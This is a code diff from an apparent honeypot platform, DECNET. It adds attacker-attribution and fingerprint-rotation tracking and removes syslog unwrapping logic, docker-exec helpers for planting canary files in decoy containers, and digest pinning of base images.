Three concurrent tasks under one supervisor:
1. ``_consume_observations`` — bus subscription on
``attacker.observation.>``; per-event handler upserts state.
2. ``_multi_actor_tick`` — periodic walk of ``attribution_state``
firing ``attribution.profile.multi_actor_suspected`` when an
identity carries ≥ ``MULTI_ACTOR_MIN_PRIMITIVES`` rows in
``multi_actor`` state. Phase 5.
3. Health + control standard channels.
*shutdown* is an optional external stop signal.
*multi_actor_tick_secs* overrides ``_thresholds.MULTI_ACTOR_TICK_SECS``
(tests use this to drive the correlator without sleeping for a
minute).
"""
log.info("attribution worker started pattern=%s", _OBSERVATION_PATTERN)
bus: BaseBus | None = None
sub_task: asyncio.Task | None = None
tick_task: asyncio.Task | None = None
heartbeat_task: asyncio.Task | None = None
control_task: asyncio.Task | None = None
tick_secs = (
multi_actor_tick_secs
if multi_actor_tick_secs is not None
else _T.MULTI_ACTOR_TICK_SECS
)
try:
candidate = get_bus(client_name=f"{_WORKER_NAME}-correlator")
await candidate.connect()
bus = candidate
sub_task = asyncio.create_task(
_consume_observations(bus, repo),
)
tick_task = asyncio.create_task(
_multi_actor_tick_loop(bus, repo, tick_secs),
)
heartbeat_task = asyncio.create_task(
_run_health_heartbeat(bus, _WORKER_NAME),
)
control_task = asyncio.create_task(
_run_control_listener_signal(bus, _WORKER_NAME),
)
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: bus unavailable, idle until bus returns: %s",
exc,
)
if shutdown is None:
shutdown = asyncio.Event()
try:
await shutdown.wait()
except (asyncio.CancelledError, KeyboardInterrupt):
log.info("attribution worker stopped")
finally:
for task in (sub_task, tick_task, heartbeat_task, control_task):
if task is None:
continue
task.cancel()
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
async def _consume_observations(
bus: BaseBus, repo: BaseRepository,
) -> None:
"""Pull events off ``attacker.observation.>`` and dispatch each
to :func:`handle_observation_event`.
Per-event exceptions are caught and logged; the subscription
survives bad payloads. If the subscription itself dies (bus
disconnect), the worker idles — the supervisor systemd unit
will restart on a clean exit.
"""
try:
sub = bus.subscribe(_OBSERVATION_PATTERN)
async with sub:
async for event in sub:
try:
await handle_observation_event(bus, repo, event)
except Exception: # noqa: BLE001
log.exception("attribution worker: handler failed")
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
log.warning(
"attribution worker: subscriber for %s died (%s)",
_OBSERVATION_PATTERN, exc,
)
async def handle_observation_event(
bus: BaseBus | None,
repo: BaseRepository,
event: Any,
) -> None:
"""Handle one ``attacker.observation.<primitive>`` event.
Phase 1: ensure the source attacker has a stub identity, then log
and return. Phase 4 will: load prior state, run merger, upsert
new state, emit ``attribution.profile.state_changed`` on
transition.
*event* is whatever shape :class:`BaseBus`'s subscription yields —
a ``BusEvent`` with ``payload`` (dict) and ``event_type`` (str)
fields. The payload carries the BEHAVE envelope plus DECNET-side
``attacker_uuid`` denorm (see
``decnet.profiler.behave_shell._handler._publish_observation``).
"""
payload = _payload_of(event)
attacker_uuid = payload.get("attacker_uuid")
primitive = payload.get("primitive")
if not attacker_uuid or not primitive:
log.debug(
"attribution worker: skipping malformed event (uuid=%r primitive=%r)",
attacker_uuid, primitive,
)
return
identity_uuid = await repo.ensure_stub_identity_for_attacker(
str(attacker_uuid),
)
if identity_uuid is None:
log.info(
"attribution worker: no Attacker row for uuid=%s yet; deferring",
attacker_uuid,
)
return
primitive_str = str(primitive)
# Load the full per-(identity, primitive) observation series.
# v0 with 1:1 stub identities, this is the single attacker's
# series; v1's clusterer makes it a cross-attacker union.
observations = await repo.observations_for_identity_primitive(
identity_uuid, primitive_str,
)
if not observations:
log.debug(
"attribution worker: no observations yet for identity=%s "
"primitive=%s (race with upsert)",
identity_uuid, primitive_str,
)
return
# Run merger.
value_kind = _value_kind_for(primitive_str)
new_state = aggregate_observations(observations, value_kind=value_kind)
# Load prior state to detect transitions.
prior = await repo.get_attribution_state(identity_uuid, primitive_str)
state_changed = prior is None or prior.get("state") != new_state.state
# Persist. last_change_ts is locked to the prior row when state is
# unchanged so the dashboard's "stable since" timestamp doesn't
# reset on every observation.
if prior is not None and not state_changed:
last_change_ts = float(prior.get("last_change_ts", new_state.last_observation_ts))
else:
last_change_ts = new_state.last_observation_ts
await repo.upsert_attribution_state({
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"current_value": new_state.current_value,
"state": new_state.state,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"last_change_ts": last_change_ts,
"last_observation_ts": new_state.last_observation_ts,
})
# Emit state_changed only on transition. Idempotent re-runs (same
# observations, same merger output) produce no event — matches
# the loop-prevention invariant that ttp.tagged uses.
if state_changed and bus is not None:
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_STATE_CHANGED),
{
"identity_uuid": identity_uuid,
"primitive": primitive_str,
"old_state": prior.get("state") if prior else None,
"new_state": new_state.state,
"current_value": new_state.current_value,
"confidence": new_state.confidence,
"observation_count": new_state.observation_count,
"ts": new_state.last_observation_ts,
},
event_type=_topics.ATTRIBUTION_PROFILE_STATE_CHANGED,
)
log.info(
"attribution worker: identity=%s primitive=%s %s -> %s confidence=%.2f",
identity_uuid, primitive_str,
(prior or {}).get("state") or "<new>", new_state.state,
new_state.confidence,
)
def _value_kind_for(primitive: str) -> str:
"""Resolve a BEHAVE primitive name to the merger's ValueKind tag.
Maps the BEHAVE registry's ``ValueKind`` enum onto the three
mergers the engine ships:
* ``CATEGORICAL`` / ``BOOL`` / ``FREE_STRING`` / ``ARRAY`` →
``"categorical"`` (BOOL is a 2-cardinality categorical;
FREE_STRING and ARRAY collapse to opaque-token categorical
until a v1 specialised merger lands)
* ``NUMERIC`` → ``"numeric"``
* ``HASH`` → ``"hash"``
Unknown primitives (registry miss) default to categorical — the
safest fallback because the categorical merger is one-outlier-
tolerant and won't lie about confidence on noisy categorical
data the way a numeric merger would on non-numeric values.
"""
if not _BEHAVE_REGISTRY_AVAILABLE:
return "categorical"
spec = PRIMITIVE_REGISTRY.get(primitive)
if spec is None or ValueKind is None:
return "categorical"
if spec.kind is ValueKind.NUMERIC:
return "numeric"
if spec.kind is ValueKind.HASH:
return "hash"
return "categorical"
def _payload_of(event: Any) -> dict[str, Any]:
"""Extract the dict payload from a BusEvent or fall through if
*event* is already a dict (test fixtures may pass either)."""
payload = getattr(event, "payload", event)
return payload if isinstance(payload, dict) else {}
async def _multi_actor_tick_loop(
bus: BaseBus, repo: BaseRepository, interval_secs: float,
) -> None:
"""Walk ``attribution_state`` every *interval_secs* and emit
``attribution.profile.multi_actor_suspected`` for any identity
whose multi_actor primitives changed since the last tick.
Dedupe: in-memory ``last_fired`` map keyed on identity_uuid →
frozenset(primitives). Same primitive set as last fire → no
re-emit. New primitive joining the set → re-emit. Set shrinks
below ``MULTI_ACTOR_MIN_PRIMITIVES`` → drop the entry so it
re-arms.
In-memory dedup is honest for v0 — restart-resets are
acceptable because the underlying ``attribution_state`` rows
persist; on first tick after restart we re-emit the current
set. v1 may persist a ``multi_actor_suspect_log`` table.
"""
last_fired: dict[str, frozenset[str]] = {}
try:
while True:
try:
await tick_multi_actor(bus, repo, last_fired)
except Exception: # noqa: BLE001
log.exception("attribution worker: multi_actor tick failed")
await asyncio.sleep(interval_secs)
except asyncio.CancelledError:
raise
async def tick_multi_actor(
bus: BaseBus | None,
repo: BaseRepository,
last_fired: dict[str, frozenset[str]],
) -> int:
"""One pass of the cross-primitive correlator. Public for tests.
Returns the number of ``multi_actor_suspected`` events emitted.
"""
candidates = await repo.list_multi_actor_identities()
fired = 0
seen_now: set[str] = set()
for entry in candidates:
identity_uuid = str(entry["identity_uuid"])
primitives: list[str] = sorted(entry.get("primitives") or [])
seen_now.add(identity_uuid)
if len(primitives) < _T.MULTI_ACTOR_MIN_PRIMITIVES:
# Repo already filters to >= 2 today; defensive against
# future schema drift.
continue
signature = frozenset(primitives)
if last_fired.get(identity_uuid) == signature:
continue
last_fired[identity_uuid] = signature
if bus is None:
continue
await publish_safely(
bus,
_topics.attribution(_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED),
{
"identity_uuid": identity_uuid,
"primitives": primitives,
"evidence_summary": (
f"{len(primitives)} primitives flagged multi_actor"
),
"confidence": _T.MULTI_ACTOR_MAX_CONFIDENCE,
"ts": _now(),
},
event_type=_topics.ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED,
)
fired += 1
log.info(
"attribution worker: multi_actor_suspected identity=%s primitives=%s",
identity_uuid, primitives,
)
# Rearm: any identity that was in last_fired but no longer in
# candidates dropped below the threshold; remove so the next
# qualifying flap re-fires.
for stale in [k for k in last_fired if k not in seen_now]:
del last_fired[stale]
return fired
def _now() -> float:
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
import time
return time.time()
__all__ = [
"run_attribution_loop",
"handle_observation_event",
"tick_multi_actor",
]

View File

@@ -1,153 +0,0 @@
"""Attacker substrate-fingerprint rotation detection.
Called inline from the prober at each fingerprint emit site. Looks up
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
when the new hash differs from the last one, emits a derived
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
stamps the ``Attacker`` row's rotation telemetry.
This is a pure library — no daemon, no async loop. The prober is the
only producer. We just teach it to derive a second event on hash
flip without standing up another worker (DEBT-032).
"""
from __future__ import annotations
import uuid as _uuid
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Callable, Literal
from sqlmodel import Session, select
from decnet.web.db.models import Attacker, AttackerFingerprintState
ProbeType = Literal["jarm", "hassh", "tcpfp"]
RotationKind = Literal[
"no_attacker_row", # caller raced ahead of correlator; skip silently
"first_sighting", # state row created, no prior hash
"unchanged", # same hash as last sighting
"rotated", # hash differs; event emitted, Attacker stamped
]
PublishFn = Callable[[str, dict[str, Any]], None]
SyslogFn = Callable[[str, dict[str, Any]], None]
@dataclass
class RotationOutcome:
"""Return shape of :func:`record_fingerprint`. Caller usually
ignores it; useful for tests + tracing."""
kind: RotationKind
old_hash: str | None
new_hash: str
rotation_count: int
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
def record_fingerprint(
session: Session,
*,
attacker_ip: str,
port: int,
probe_type: ProbeType,
new_hash: str,
ts: datetime,
publish_fn: PublishFn | None = None,
syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
"""Upsert state row; on hash diff, emit derived event + stamp.
Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
Attacker table. If no Attacker row exists yet (the prober raced
ahead of the correlator), returns ``kind="no_attacker_row"`` and
does nothing — the next probe cycle will pick it up once the
correlator has caught up.
State upsert + Attacker stamp + publish + syslog are committed in
one transaction so a partial failure can't desync state from
what was emitted.
"""
attacker = session.exec(
select(Attacker).where(Attacker.ip == attacker_ip)
).first()
if attacker is None:
return RotationOutcome(
kind="no_attacker_row",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
row = session.exec(
select(AttackerFingerprintState).where(
AttackerFingerprintState.attacker_uuid == attacker.uuid,
AttackerFingerprintState.port == port,
AttackerFingerprintState.probe_type == probe_type,
)
).first()
if row is None:
session.add(AttackerFingerprintState(
uuid=str(_uuid.uuid4()),
attacker_uuid=attacker.uuid,
port=port,
probe_type=probe_type,
last_hash=new_hash,
last_seen=ts,
rotation_count=0,
))
session.commit()
return RotationOutcome(
kind="first_sighting",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
if row.last_hash == new_hash:
row.last_seen = ts
session.add(row)
session.commit()
return RotationOutcome(
kind="unchanged",
old_hash=row.last_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)
old_hash = row.last_hash
row.last_hash = new_hash
row.last_seen = ts
row.rotation_count += 1
session.add(row)
attacker.rotation_count += 1
attacker.last_rotation_at = ts
session.add(attacker)
payload: dict[str, Any] = {
"attacker_uuid": attacker.uuid,
"attacker_ip": attacker_ip,
"port": port,
"probe_type": probe_type,
"old_hash": old_hash,
"new_hash": new_hash,
"rotation_count": row.rotation_count,
"ts": ts.isoformat(),
}
if publish_fn is not None:
publish_fn(_ROTATED_EVENT_TYPE, payload)
if syslog_fn is not None:
syslog_fn(_ROTATED_EVENT_TYPE, payload)
session.commit()
return RotationOutcome(
kind="rotated",
old_hash=old_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)

View File

@@ -32,21 +32,6 @@ _RFC5424_RE = re.compile(
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
# Docker-stdout collector envelope wraps the inner ``logger
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
# real MSGID lives in the body. Mirrors the unwrap logic in
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
# read the same on-wire format.
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
# Structured data block: [relay@55555 k="v" ...]
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
@@ -136,21 +121,6 @@ def parse_line(line: str) -> LogEvent | None:
ts_raw, decky, service, event_type, sd_rest = m.groups()
# Unwrap double-wrapped Docker-stdout envelopes around bash
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
# before the decky/service NIL-guard below — the OUTER decky is
# the docker host, the inner header carries the real source.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
if decky == "-" or service == "-":
return None
@@ -167,19 +137,6 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = (

View File

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"),
))
except Exception as exc:
except Exception as exc: # noqa: BLE001
log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s",
exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets,
)
except Exception:
except Exception: # noqa: BLE001
log.exception("reuse correlator: tick failed")
results = []
@@ -120,11 +120,11 @@ async def run_reuse_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set()
except asyncio.CancelledError:
raise
except Exception as exc:
except Exception as exc: # noqa: BLE001
log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc,

View File

@@ -1,39 +0,0 @@
"""Shared primitives for writing/deleting files inside running deckies.
The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.
Public API:
* :func:`write_file_to_container` — write bytes at a path, set mode,
optionally backdate mtime.
* :func:`delete_file_from_container` — best-effort ``rm -f``.
* :func:`resolve_topology_container` — pick the right docker container
for a MazeNET decky based on its services list.
* :func:`resolve_decky_container` — async helper that takes
``(decky_name, topology_id?)``, hydrates the topology when needed,
and returns the docker container name.
Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations
from .resolve import (
resolve_decky_container,
resolve_topology_container,
)
from .write import (
delete_file_from_container,
write_file_to_container,
)
__all__ = [
"delete_file_from_container",
"resolve_decky_container",
"resolve_topology_container",
"write_file_to_container",
]

View File

@@ -1,72 +0,0 @@
"""Decky-name → docker container name resolution.
Two scopes:
* **Fleet**: every fleet decky has a ``ssh`` service container named
``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
decky exposes the ssh service; otherwise the decky's base container
named ``decnet_t_<topology_id8>_<decky_name>`` (matches
:func:`decnet.topology.compose._container_name`).
Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions — they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations
from typing import Any, Iterable, Optional
_SSH_CONTAINER_SUFFIX = "-ssh"
def resolve_topology_container(
topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
"""Container name for a MazeNET decky.
See module docstring for the convention. Pure function — no I/O.
"""
if "ssh" in set(services):
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
return f"decnet_t_{topology_id[:8]}_{decky_name}"
async def resolve_decky_container(
repo: Any,
decky_name: str,
*,
topology_id: Optional[str] = None,
) -> str:
"""Resolve the docker container name for *decky_name*.
Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
unconditionally. No DB lookup — the caller is responsible for
knowing the decky exists; if it doesn't, the subsequent
``docker exec`` returns a clear error.
Topology path: hydrates the topology, looks up the decky's services
list, delegates to :func:`resolve_topology_container`.
Raises:
LookupError — when ``topology_id`` is set but the topology or
its named decky doesn't exist. Callers translate this into
404/422 at the API layer.
"""
if topology_id is None:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
raise LookupError(f"topology {topology_id!r} not found")
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
name = cfg.get("name") or decky.get("name")
if name == decky_name:
services = decky.get("services") or []
return resolve_topology_container(topology_id, decky_name, services)
raise LookupError(
f"decky {decky_name!r} is not in topology {topology_id!r}"
)

View File

@@ -1,124 +0,0 @@
"""``docker exec``-driven file write/delete inside a decky container.
The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe — interpolating bytes into argv
would trip ARG_MAX (~128 KB on most kernels) for any non-trivial blob.
"""
from __future__ import annotations
import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional
from decnet.logging import get_logger
log = get_logger("decky_io.write")
_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
argv: list[str],
*,
stdin_bytes: Optional[bytes] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=timeout,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
async def write_file_to_container(
container: str,
path: str,
content: bytes,
*,
mode: int = 0o644,
mtime: Optional[datetime] = None,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Write *content* to *path* inside *container* via ``docker exec``.
The directory above *path* is created if missing; *mode* is applied
after the write; when *mtime* is provided the file is backdated via
``touch -d`` (UTC ISO 8601).
Returns ``(success, error_or_none)``. ``error`` is the trimmed
docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
"""
if not path:
return False, "empty path"
encoded = base64.b64encode(content)
parts = [
f"mkdir -p {shlex.quote(_dirname(path))}",
f"base64 -d > {shlex.quote(path)}",
f"chmod {mode:o} {shlex.quote(path)}",
]
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
sh_cmd = " && ".join(parts)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
success = rc == 0
if success:
return True, None
err = stderr.strip()[:256] or f"rc={rc}"
log.warning(
"decky_io.write failed container=%s path=%s rc=%d stderr=%r",
container, path, rc, stderr[:120],
)
return False, err
async def delete_file_from_container(
container: str,
path: str,
*,
timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
"""Best-effort ``rm -f`` of *path* inside *container*.
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
when the file is already gone, so a True result here means "the
file is not present after this call", regardless of who unlinked it.
"""
sh_cmd = f"rm -f {shlex.quote(path)}"
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run(argv, timeout=timeout)
if rc == 0:
return True, None
return False, stderr.strip()[:256] or f"rc={rc}"

View File

@@ -18,86 +18,69 @@ class DistroProfile:
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
# Base images are pinned by digest (sha256) to make `docker pull`
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
# can't silently swap content under us. The :tag is kept for human
# readability; the @sha256 is what Docker actually resolves.
# Refresh procedure: `docker pull <tag>` then `docker inspect
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
DISTROS: dict[str, DistroProfile] = {
"debian": DistroProfile(
slug="debian",
image=_DEBIAN_BOOKWORM,
image="debian:bookworm-slim",
display_name="Debian 12 (Bookworm)",
hostname_style="generic",
build_base=_DEBIAN_BOOKWORM,
build_base="debian:bookworm-slim",
),
"ubuntu22": DistroProfile(
slug="ubuntu22",
image=_UBUNTU_22_04,
image="ubuntu:22.04",
display_name="Ubuntu 22.04 LTS (Jammy)",
hostname_style="generic",
build_base=_UBUNTU_22_04,
build_base="ubuntu:22.04",
),
"ubuntu20": DistroProfile(
slug="ubuntu20",
image=_UBUNTU_20_04,
image="ubuntu:20.04",
display_name="Ubuntu 20.04 LTS (Focal)",
hostname_style="generic",
build_base=_UBUNTU_20_04,
build_base="ubuntu:20.04",
),
"rocky9": DistroProfile(
slug="rocky9",
image=_ROCKY_9,
image="rockylinux:9-minimal",
display_name="Rocky Linux 9",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"centos7": DistroProfile(
slug="centos7",
image=_CENTOS_7,
image="centos:7",
display_name="CentOS 7",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"alpine": DistroProfile(
slug="alpine",
image=_ALPINE_3_19,
image="alpine:3.19",
display_name="Alpine Linux 3.19",
hostname_style="minimal",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"fedora": DistroProfile(
slug="fedora",
image=_FEDORA_39,
image="fedora:39",
display_name="Fedora 39",
hostname_style="rhel",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
"kali": DistroProfile(
slug="kali",
image=_KALI_ROLLING,
image="kalilinux/kali-rolling",
display_name="Kali Linux (Rolling)",
hostname_style="rolling",
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
),
"arch": DistroProfile(
slug="arch",
image=_ARCH_LATEST,
image="archlinux:latest",
display_name="Arch Linux",
hostname_style="rolling",
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
),
}

View File

@@ -3,7 +3,6 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
"""
import asyncio
import json
import shutil
import subprocess # nosec B404
import time
@@ -58,8 +57,6 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
_NTLMSSP_SERVICES = {"smb", "rdp"}
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
_CADDY_SERVICES = {"http", "https"}
def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -166,104 +163,6 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest)
def _chown_tree(dest: Path, owner_ref: Path) -> None:
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
import os
if os.geteuid() != 0:
return
st = owner_ref.stat()
uid, gid = st.st_uid, st.st_gid
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
for p in targets:
try:
os.lchown(p, uid, gid)
except OSError:
pass
def _sync_caddy_modules(config: DecnetConfig) -> None:
"""Mirror _caddy_modules/ into http/https build contexts.
The xcaddy builder stage in each Dockerfile references
``_caddy_modules/decnetfp`` relative to its build context (the
per-service template dir). Since the canonical source lives one
level up at ``templates/_caddy_modules/``, we sync it into each
active http/https build context before compose up, mirroring the
sessrec / auth-helper patterns.
"""
from decnet.services.registry import get_service
src_dir = _CANONICAL_CADDY_MODULES_DIR
if not src_dir.is_dir():
return
seen: set[Path] = set()
for decky in config.deckies:
for svc_name in decky.services:
if svc_name not in _CADDY_SERVICES:
continue
svc = get_service(svc_name)
if svc is None:
continue
ctx = svc.dockerfile_context()
if ctx is None or ctx in seen:
continue
seen.add(ctx)
dest_dir = ctx / "_caddy_modules"
dest_dir.mkdir(exist_ok=True)
for child in src_dir.iterdir():
dest_child = dest_dir / child.name
if child.is_dir():
if dest_child.exists():
shutil.rmtree(dest_child)
shutil.copytree(child, dest_child)
_chown_tree(dest_child, src_dir)
else:
if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
shutil.copy2(child, dest_child)
_chown_tree(dest_child, src_dir)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os
